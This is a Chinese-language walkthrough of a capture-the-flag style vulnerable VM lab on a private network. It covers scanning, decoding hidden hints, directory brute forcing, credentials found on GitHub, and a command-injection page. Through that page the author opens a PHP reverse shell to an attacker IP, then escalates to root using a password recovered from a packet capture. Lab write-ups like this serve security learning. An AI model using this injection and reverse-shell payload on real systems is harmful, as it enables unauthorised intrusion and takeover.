# 靶场搭建
下载直接导入,设置成 NAT 模式,就能用了
IP: 192.168.1.128
# 渗透过程
# 信息初收集
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu)) |
只有一个端口,web 服务,那就说明你懂得
打开 web 服务端先 F12 看到提示 <!--0x643239334c6d70775a773d3d-->
16 进制转字符,base64 解码得到 wow.jpg
,访问毛都没有啊
dirsearch 扫到了 images,再加上 wow.jpg
,出来个吊图,binwalk 了一下也没问题啊 ==、
正当我一筹莫展,猛回头,发现标题是 /Challenge
,拼接一下,哦 K 了家人,找到入口了
注入也不行,牛魔的这交互太卡了,感觉有问题。
加大收集强度,在 Challenge
上大字典: dirsearch -u http://192.168.1.128:33447/Challenge -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
无果
进一步收集信息,在前段源代码中发现了 forms.js
,能够查看到中间件的详细信息。
通过在互联网上搜索这个 peredur.net
在 github 中搜索到一组账号密码
Username : test_user | |
Email : [email protected] | |
Password : 6ZaxN2Vzm9NUJT2y |
登录后就是一个文件包含,尝试包含一些敏感文件,无果
查看源代码,发现底部有提示 0x5933566a4c6e4a34626e413d
,转换成字符串后 base64 解密,rot13 解密后逆向,得到提示 cake.php
┌──(root㉿kali)-[~] | |
└─# echo -n '0x5933566a4c6e4a34626e413d' | xxd -r -p | base64 -d | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | |
cake.php |
进去发现是个提示,标题是 /Magic_Box
,扫一下
# shell
发现 RCE: http://192.168.1.128:33447/Challenge/Magic_Box/command.php
直接反弹 shell: www.baidu.com;php -r '$sock=fsockopen("192.168.1.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# 提权
寻找可以利用的文件,收集 acid 用户的文件时发现了两个点,一个是 chkrootkit 在 pwn_me 文件夹下,感觉可以利用,用 msf 搞了一下,好像没什么戏。
还发现一个 hint_pcapng
流量包,下载下来查看一下 tcp 流。发现 saman 密码 1337hax0r
su 过去,sudo 拿到 root 权限
# 小结
偏 CTF,绕的一 B